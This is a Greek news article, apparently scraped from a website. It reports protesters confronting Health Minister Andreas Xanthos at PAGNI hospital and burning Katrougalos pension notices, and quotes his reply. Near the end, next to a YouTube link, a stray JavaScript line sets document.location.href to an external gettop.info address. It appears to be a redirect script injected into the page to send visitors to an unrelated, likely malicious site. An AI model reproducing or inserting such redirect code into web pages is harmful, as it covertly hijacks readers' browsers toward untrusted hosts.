Έκαψαν τις επιστολές Κατρούγκαλου μπροστά στον Ξανθό: Μας καταστρέψατε (BINTEO)

0
9

 

Σε κλίμα έντασης, φωνάζοντας «Ντροπή σας» και «Μας καταστρέψατε» συνταξιούχοι, εργαζόμενοι στην υγεία και πολίτες επιτέθηκαν φραστικά στην κυβέρνηση και στον Υπουργό Υγείας, Ανδρέα Ξανθό κατά την άφιξη του στο ΠΑΓΝΗ.

Μάλιστα, σύμφωνα με το flashnews.gr, κάποιοι εκφράζοντας την αγανάκτησή τους έκαψαν τα ειδοποιητήρια του Κατρούγκαλου μπροστά στον υπουργό Υγείας.

xanthos7

Ο κ. Ξανθός μετά τη… «θερμή» υποδοχή που του επεφύλαξαν, δήλωσε:

«Θεωρώ ότι η κοινωνική διαμαρτυρία αυτή την περίοδο στη χώρα είναι και δικαιολογημένη και ενδεχομένως αναμενόμενη. Δεν έχουμε αλλεργία απέναντι στην κοινωνική διαμαρτυρία, ούτε αλλεργία απέναντι στον κόσμο που αγωνίζεται και διεκδικεί. Πιστεύω ότι σήμερα έχουμε την ωριμότητα όλοι σε μία δύσκολη φάση και για την χώρα και για την κοινωνία, να αναζητούμε διαύλους συνεννόησης και επικοινωνίας. Τα προβλήματα υπάρχουν είναι γνωστά, καλώς αναδεικνύονται. Τα σωματεία διεκδικούν. Η πολιτική ηγεσία οφείλει να ακούει, να διαλέγεται. Γι΄ αυτό έχουμε έρθει σήμερα εδώ. Να κάνουμε μία ανοιχτή διαδικασία, όπως και στο Βενιζέλειο. Να συζητήσουμε με τον κόσμο που δουλεύει και πασχίζει να κρατήσει σε αξιοπρεπές επίπεδο την περίθαλψη στον τόπο μας και νομίζω ότι όλα τα υπόλοιπα περιττεύουν.

Θεωρώ ότι υπάρχει περιθώριο γόνιμου διαλόγου και πολιτισμένου διαλόγου. Αντιλαμβάνομαι την ανάγκη κάποιων να δημιουργήσουν εικόνες αποδοκιμασίας και να δημιουργήσουν πολιτικό γεγονός και μία εικόνα που υποτίθεται οι υπουργοί της κυβέρνησης δεν μπορούν να προσεγγίσουν τα δημόσια νοσοκομεία. Εμείς είμαστε άνθρωποι της δημόσιας περίθαλψης. Εγώ σε αυτό το νοσοκομείο έχω κάνει ειδικότητα. Έχουμε γνωστούς, φίλους. Έχουμε δουλέψει μαζί και έχουμε αγωνιστεί μαζί για να υπάρχει αξιοπρέπεια στην περίθαλψη στη χώρας μας. Αυτό είναι το ζητούμενο και νομίζω θα προχωρήσουμε αταλάντευτα σε αυτό».

https://youtu.be/jjubNowythM setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here